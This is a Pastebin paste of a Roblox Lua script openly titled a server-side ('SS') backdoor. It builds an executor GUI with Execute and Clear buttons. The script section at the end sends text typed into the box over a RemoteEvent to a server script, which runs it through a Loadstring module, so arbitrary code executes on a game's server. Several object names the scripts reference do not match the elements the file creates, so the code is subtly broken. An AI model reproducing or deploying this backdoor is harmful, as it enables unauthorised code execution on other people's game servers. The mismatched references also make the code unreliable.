Advertisement
Guest User

SS backdoor (PRIVATE!!!!!!!!!)

a guest
Oct 14th, 2019
688
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.65 KB | None | 0 0
  1. ----Made by Dante_Sem Discord Dante_sem#9594
  2.  
  3. local Dante_Sem = Instance.new("ScreenGui")
  4. local Open = Instance.new("Frame")
  5. local Start = Instance.new("TextButton")
  6. local Text = Instance.new("TextLabel")
  7. local KIWI = Instance.new("ImageLabel")
  8. local Main = Instance.new("Frame")
  9. local Draggable = Instance.new("TextLabel")
  10. local Draggable2 = Instance.new("TextLabel")
  11. local Close = Instance.new("TextButton")
  12. local Textbox = Instance.new("TextBox")
  13. local Execute = Instance.new("TextButton")
  14. local Clear = Instance.new("TextButton")
  15. local ImageLabel = Instance.new("ImageLabel")
  16. local Credits = Instance.new("TextLabel")
  17. local KIWI_2 = Instance.new("TextLabel")
  18.  
  19. --Properties
  20.  
  21. Dante_Sem.Name = "Dante_Sem"
  22. Dante_Sem.Parent = game.CoreGui
  23.  
  24. Open.Name = "Open"
  25. Open.Parent = Dante_Sem
  26. Open.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  27. Open.BorderColor3 = Color3.new(1, 1, 1)
  28. Open.Position = UDim2.new(0.000796178356, 0, 0.369778872, 0)
  29. Open.Size = UDim2.new(0, 235, 0, 236)
  30.  
  31. Start.Name = "Start"
  32. Start.Parent = Open
  33. Start.BackgroundColor3 = Color3.new(0.886275, 1, 0.733333)
  34. Start.BorderColor3 = Color3.new(1, 1, 1)
  35. Start.Position = UDim2.new(0.0638297871, 0, 0.288135588, 0)
  36. Start.Size = UDim2.new(0, 200, 0, 50)
  37. Start.Font = Enum.Font.GothamBold
  38. Start.Text = "Start"
  39. Start.TextColor3 = Color3.new(0, 0, 0)
  40. Start.TextScaled = true
  41. Start.TextSize = 14
  42. Start.TextWrapped = true
  43. Start.MouseButton1Down:connect(function()
  44. Main.Visible = true
  45. Open.Visible = false
  46. end)
  47.  
  48. Text.Name = "Text"
  49. Text.Parent = Open
  50. Text.BackgroundColor3 = Color3.new(0.866667, 1, 0.737255)
  51. Text.BorderColor3 = Color3.new(1, 1, 1)
  52. Text.Position = UDim2.new(0.0638297871, 0, 0.665254235, 0)
  53. Text.Size = UDim2.new(0, 200, 0, 77)
  54. Text.Font = Enum.Font.GothamBold
  55. Text.Text = "Made By Dante_Sem"
  56. Text.TextColor3 = Color3.new(0, 0, 0)
  57. Text.TextScaled = true
  58. Text.TextSize = 14
  59. Text.TextWrapped = true
  60.  
  61. KIWI.Name = "KIWI"
  62. KIWI.Parent = Open
  63. KIWI.BackgroundColor3 = Color3.new(1, 1, 1)
  64. KIWI.BorderColor3 = Color3.new(0.623529, 1, 0.509804)
  65. KIWI.Position = UDim2.new(0.00425531901, 0, 0.00423728814, 0)
  66. KIWI.Size = UDim2.new(0.297872335, 0, 0.220338985, 0)
  67. KIWI.Image = "rbxgameasset://Images/vector-kiwi-pattern"
  68.  
  69. Main.Name = "Main"
  70. Main.Parent = Dante_Sem
  71. Main.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  72. Main.BorderColor3 = Color3.new(0.623529, 1, 0.509804)
  73. Main.Position = UDim2.new(0.312101901, 0, 0.170761675, 0)
  74. Main.Size = UDim2.new(0, 509, 0, 475)
  75. Main.Draggable = true
  76.  
  77. Draggable.Name = "Draggable"
  78. Draggable.Parent = Main
  79. Draggable.Active = true
  80. Draggable.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  81. Draggable.BorderColor3 = Color3.new(1, 1, 1)
  82. Draggable.Position = UDim2.new(-0.0785854608, 0, 0, 0)
  83. Draggable.Selectable = true
  84. Draggable.Size = UDim2.new(0, 591, 0, 50)
  85. Draggable.Font = Enum.Font.SourceSans
  86. Draggable.Text = ""
  87. Draggable.TextColor3 = Color3.new(0, 0, 0)
  88. Draggable.TextSize = 14
  89.  
  90. Draggable2.Name = "Draggable2"
  91. Draggable2.Parent = Main
  92. Draggable2.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  93. Draggable2.BorderColor3 = Color3.new(1, 1, 1)
  94. Draggable2.Position = UDim2.new(-0.0766208246, 0, 0.911578953, 0)
  95. Draggable2.Size = UDim2.new(0, 591, 0, 50)
  96. Draggable2.Font = Enum.Font.SourceSans
  97. Draggable2.Text = ""
  98. Draggable2.TextColor3 = Color3.new(0, 0, 0)
  99. Draggable2.TextSize = 14
  100.  
  101. Close.Name = "Close"
  102. Close.Parent = Main
  103. Close.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  104. Close.BorderColor3 = Color3.new(0.623529, 1, 0.509804)
  105. Close.BorderSizePixel = 0
  106. Close.Position = UDim2.new(0.950884104, 0, 0, 0)
  107. Close.Size = UDim2.new(0, 67, 0, 50)
  108. Close.Font = Enum.Font.Cartoon
  109. Close.Text = "X"
  110. Close.TextColor3 = Color3.new(1, 0, 0)
  111. Close.TextScaled = true
  112. Close.TextSize = 14
  113. Close.TextWrapped = true
  114. Close.MouseButton1Down:connect(function()
  115. Open.Visible = true
  116. Main.Visible = false
  117. end)
  118.  
  119. Textbox.Name = "Textbox"
  120. Textbox.Parent = Main
  121. Textbox.BackgroundColor3 = Color3.new(0.513726, 1, 0.529412)
  122. Textbox.BorderColor3 = Color3.new(0.623529, 1, 0.509804)
  123. Textbox.Position = UDim2.new(0.017681729, 0, 0.164210528, 0)
  124. Textbox.Size = UDim2.new(0.960707247, 0, 0.511578977, 0)
  125. Textbox.ClearTextOnFocus = false
  126. Textbox.Font = Enum.Font.GothamSemibold
  127. Textbox.MultiLine = true
  128. Textbox.Text = "---scripts here"
  129. Textbox.TextColor3 = Color3.new(0.843137, 1, 0.807843)
  130. Textbox.TextScaled = true
  131. Textbox.TextSize = 14
  132. Textbox.TextWrapped = true
  133.  
  134. Execute.Name = "Execute"
  135. Execute.Parent = Main
  136. Execute.BackgroundColor3 = Color3.new(0.584314, 1, 0.490196)
  137. Execute.BorderColor3 = Color3.new(0.65098, 1, 0.490196)
  138. Execute.Position = UDim2.new(0.0216110013, 0, 0.730526328, 0)
  139. Execute.Size = UDim2.new(0, 212, 0, 61)
  140. Execute.Font = Enum.Font.Cartoon
  141. Execute.Text = "Execute"
  142. Execute.TextColor3 = Color3.new(0, 0, 0)
  143. Execute.TextScaled = true
  144. Execute.TextSize = 14
  145. Execute.TextWrapped = true
  146.  
  147. Clear.Name = "Clear"
  148. Clear.Parent = Main
  149. Clear.BackgroundColor3 = Color3.new(0.584314, 1, 0.490196)
  150. Clear.BorderColor3 = Color3.new(0.65098, 1, 0.490196)
  151. Clear.Position = UDim2.new(0.528487206, 0, 0.730526328, 0)
  152. Clear.Size = UDim2.new(0, 212, 0, 61)
  153. Clear.Font = Enum.Font.Cartoon
  154. Clear.Text = "Clear"
  155. Clear.TextColor3 = Color3.new(0, 0, 0)
  156. Clear.TextScaled = true
  157. Clear.TextSize = 14
  158. Clear.TextWrapped = true
  159.  
  160. ImageLabel.Parent = Main
  161. ImageLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  162. ImageLabel.BorderColor3 = Color3.new(0.623529, 1, 0.509804)
  163. ImageLabel.Position = UDim2.new(-0.0785854608, 0, 0, 0)
  164. ImageLabel.Size = UDim2.new(0, 51, 0, 50)
  165. ImageLabel.Image = "rbxgameasset://Images/vector-kiwi-pattern"
  166.  
  167. Credits.Name = "Credits"
  168. Credits.Parent = Main
  169. Credits.Active = true
  170. Credits.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  171. Credits.BorderSizePixel = 0
  172. Credits.Position = UDim2.new(-0.0766208246, 0, 0.911578953, 0)
  173. Credits.Size = UDim2.new(0, 591, 0, 50)
  174. Credits.Font = Enum.Font.Cartoon
  175. Credits.Text = "Scripted By Dante_Sem"
  176. Credits.TextColor3 = Color3.new(0, 0, 0)
  177. Credits.TextScaled = true
  178. Credits.TextSize = 14
  179. Credits.TextWrapped = true
  180.  
  181. KIWI_2.Name = "KIWI"
  182. KIWI_2.Parent = Main
  183. KIWI_2.BackgroundColor3 = Color3.new(0.623529, 1, 0.509804)
  184. KIWI_2.BorderColor3 = Color3.new(1, 1, 1)
  185. KIWI_2.BorderSizePixel = 0
  186. KIWI_2.Position = UDim2.new(0.104125738, 0, 0, 0)
  187. KIWI_2.Size = UDim2.new(0, 397, 0, 50)
  188. KIWI_2.Font = Enum.Font.Cartoon
  189. KIWI_2.Text = "KIWI"
  190. KIWI_2.TextColor3 = Color3.new(0, 0, 0)
  191. KIWI_2.TextScaled = true
  192. KIWI_2.TextSize = 14
  193. KIWI_2.TextStrokeColor3 = Color3.new(0.623529, 1, 0.509804)
  194. KIWI_2.TextWrapped = true
  195.  
  196. -- Scripts:
  197.  
  198. local function LOQEH_fake_script() -- Execute.LocalScript
  199. local script = Instance.new('LocalScript', Execute)
  200.  
  201. local execute = script.Parent.Parent["Execute the stupid script"]
  202. local text = script.Parent.Parent.Code
  203. local remote = script.Parent.gay
  204.  
  205. execute.MouseButton1Click:Connect(function()
  206. remote:FireServer(text.Text)
  207. end)
  208. end
  209. coroutine.wrap(LOQEH_fake_script)()
  210. local function PBXTPH_fake_script() -- Execute.Script
  211. local script = Instance.new('Script', Execute)
  212.  
  213. local remote = script.Parent.remote -- your remote ebicgamermolment
  214.  
  215. remote.OnServerEvent:Connect(function(idk, lol) -- function for your executor
  216. require(script.Loadstring)(lol)() -- this code so it actally executes requires and things
  217. end)-- end) meaning this is the end of the script return function
  218. end
  219. coroutine.wrap(PBXTPH_fake_script)()
  220. local function BVSRD_fake_script() -- Clear.LocalScript
  221. local script = Instance.new('LocalScript', Clear)
  222.  
  223. local clear = script.Parent.Parent.clr
  224. local text = script.Parent.Parent["Execute scripts here"]
  225.  
  226. clear.MouseButton1Click:Connect(function()
  227. text.Text = ""
  228. end)
  229.  
  230. end
  231. coroutine.wrap(BVSRD_fake_script)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement